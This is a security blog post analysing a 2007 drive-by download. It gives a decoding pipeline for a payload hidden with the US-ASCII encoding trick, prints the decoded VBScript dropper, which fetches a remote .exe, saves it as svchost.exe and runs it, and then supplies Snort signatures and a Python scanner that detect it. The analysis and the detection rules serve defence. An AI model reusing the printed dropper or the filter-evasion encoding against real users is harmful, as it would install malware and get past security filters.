Following on from the ISC "Super Bowl Infection - More Sites" blog, I did some investigation into the techniques used.
As explained in the ISC blogs, some JavaScript code loaded from a hacked web page opens a second payload through an iframe. That payload has been encoded with the "US-ASCII exploit" (CVE-2006-3227) to evade web protection software: the encoding tool, written in June 2006, adds the hexadecimal value 0x80 to every byte of the script. Because the page declares the US-ASCII charset, Internet Explorer drops the high bit of each byte and sees the original script, while filters that inspect the raw bytes see only high-bit garbage. The following script will decode the payload:
curl -s http://www.example.com/payload.htm | \
sed '/< .*>/d' | \
hexdump | \
sed 's/^.\{7\}//;s/ //g;' | \
tr '\n' ' ' | sed 's/ //g' | \
perl -pe 's/([0-9A-Z]{2})([0-9A-Z]{2})/$a=chr(hex($2)-hex(80));$a.=chr(hex($1)-hex(80));/ieg;'
The output of this command is:
<html>
<script language="VBScript">
on error resume next
OOOOOOOOOOOOOwwwwwww = "http://www.example.com/acp/www.exe"
Set eeeeeeeeeeeennnnnnnnnnn = document.createElement("obj"&"ect")
eeeeeeeeeeeennnnnnnnnnn.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983"&"A-00C04FC"&"29E36"
str="Micro"&"soft"&".XMLH"&"TTP"
Set x = eeeeeeeeeeeennnnnnnnnnn.CreateObject(str,"")
set S = eeeeeeeeeeeennnnnnnnnnn.createobject("Ad"&"odb.S"&"tr"&"eam","")
S.type = 1
x.Open "GET", OOOOOOOOOOOOOwwwwwww, False
x.Send
set F = eeeeeeeeeeeennnnnnnnnnn.createobject("Scrip"&"ting.F"&"ileS"&"ystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,"svchost.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
set Q = eeeeeeeeeeeennnnnnnnnnn.createobject("Shell.App"&"licat"&"ion","")
Q.ShellExecute fname1,"","","o"&"pe"&"n",0
S.close
</script>
Wide character in print at -e line 1, <> line 1.
</html>
Once the payload is downloaded, it is written to the temporary folder as "svchost.exe" and then executed.
With the decoding done, I began to analyse the payload itself:
lynx http://www.example.com/acp/www.exe --mime_header
HTTP/1.0 502 Bad Gateway
Server: Microsoft-IIS/5.0
Date: Tue, 06 Feb 2007 10:53:58 GMT
Content-Length: 215
Content-Type: text/html
Age: 249
<head><title>Error in CGI Application</title></head>
<body><h1>CGI Error</h1>The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:<p></p><p><pre><
Any idea of what's happening here?
Instead of serving the "www.exe" file, the server has been configured to execute it as a server-side script (CGI), which is why IIS answers with a "CGI Error" instead of the binary. The malware therefore runs on the web server every time someone browses a page containing this payload, and the file cannot be downloaded and copied for analysis ... How sad!
That said, this also tells us that the bad guy did not test his payload, or that the payload was installed automatically.
With the payload investigation finished, I wrote some Snort signatures to detect it:
# bc d3 c3 d2 c9 d0 d4 <SCRIPT
# bc f3 e3 f2 e9 f0 f4 <script
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BLEEDING-EDGE US-ASCII Obfuscated script"; flow:established,from_server; \
pcre:"/\xbc[\xf3\xd3][\xe3\xc3][\xf2\xd2][\xe9\xc9][\xf0\xd0][\xf4\xd4]/"; pcre:"/US-ASCII/i"; \
reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/; \
reference:cve,2006-3227; reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; \
classtype:web-application-attack; sid:200702061; rev:1;)
# ae ef f0 e5 ee a0 a2 e7 e5 f4 a2 .open "get"
# ae cf d0 c5 ce a0 a2 c7 c5 d4 a2 .OPEN "GET"
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript download file"; flow:established,from_server; \
pcre:"/\xae[\xef\xcf][\xf0\xd0][\xe5\xc5][\xee\xce]\xa0\xa2[\xe7\xc7][\xe5\xc5][\xf4\xd4]\xa2/"; pcre:"/US-ASCII/i"; \
reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/; reference:cve,2006-3227; \
reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack; sid:200702062; rev:1;)
# f3 e8 e5 ec ec e5 f8 e5 e3 f5 f4 e5 shellexecute
# d3 c8 c5 cc cc c5 d8 c5 c3 d5 d4 c5 SHELLEXECUTE
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript execute command"; flow:established,from_server; \
pcre:"/[\xf3\xd3][\xe8\xc8][\xe5\xc5][\xec\xcc][\xec\xcc][\xe5\xc5][\xf8\xd8][\xe5\xc5][\xe3\xc3][\xf5\xd5][\xf4\xd4][\xe5\xc5]/"; \
pcre:"/US-ASCII/i"; reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/; reference:cve,2006-3227; \
reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack; sid:200702063; rev:1;)
# f6 e2 f3 e3 f2 e9 f0 f4 vbscript
# d6 c2 d3 c3 d2 c9 d0 d4 VBSCRIPT
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript"; flow:established,from_server; \
pcre:"/[\xf6\xd6][\xe2\xc2][\xf3\xd3][\xe3\xc3][\xf2\xd2][\xe9\xc9][\xf0\xd0][\xf4\xd4]/"; pcre:"/US-ASCII/i"; \
reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/; reference:cve,2006-3227; \
reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack; sid:200702064; rev:1;)
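As an added example (my own code, not part of the original post), the Python below does the same two jobs as the decoding pipeline and the four signatures above: it strips the 0x80 shift from a captured page body, and it checks the still-encoded bytes for the same markers the pcre options match on, since an IDS sees the page before the browser decodes it. The sample body is constructed here and the marker names are my own labels.

```python
# Added example, not code from the original post: decode a US-ASCII-obfuscated
# page body and check the still-encoded bytes for the markers the Snort rules
# above match on. The sample body below is constructed for this example.
import re

PLAIN_SAMPLE = (b'<html><script language="VBScript">\r\n'
                b'x.Open "GET", u, False\r\n'
                b'</script></html>')
# What the server actually sends: every byte shifted up by 0x80.
OBFUSCATED_SAMPLE = bytes(b + 0x80 for b in PLAIN_SAMPLE)

def us_ascii_decode(data: bytes) -> bytes:
    """Undo the 0x80 shift (what the hexdump/perl pipeline does).
    Bytes already below 0x80 are left alone so plain HTML wrapped
    around the encoded script survives unchanged."""
    return bytes(b - 0x80 if b >= 0x80 else b for b in data)

def obfuscated_pattern(token: str) -> re.Pattern:
    """Build the byte regex for `token` after the 0x80 shift, accepting
    either letter case the way the character classes in the pcre options do."""
    parts = []
    for ch in token:
        if ch.isalpha():
            parts.append("[\\x%02x\\x%02x]" % (ord(ch.lower()) + 0x80,
                                               ord(ch.upper()) + 0x80))
        else:
            parts.append("\\x%02x" % (ord(ch) + 0x80))
    return re.compile("".join(parts).encode("ascii"))

# Marker names are my own labels; the tokens are the ones the four rules use.
MARKERS = {
    "script tag": "<script",
    "xmlhttp get": '.open "get"',
    "shellexecute": "shellexecute",
    "vbscript": "vbscript",
}
PATTERNS = {name: obfuscated_pattern(tok) for name, tok in MARKERS.items()}

def scan(raw_body: bytes) -> list:
    """Names of the markers present in a raw (not yet decoded) response body."""
    return [name for name, pat in PATTERNS.items() if pat.search(raw_body)]

if __name__ == "__main__":
    print(scan(OBFUSCATED_SAMPLE))
    print(us_ascii_decode(OBFUSCATED_SAMPLE).decode("ascii"))
```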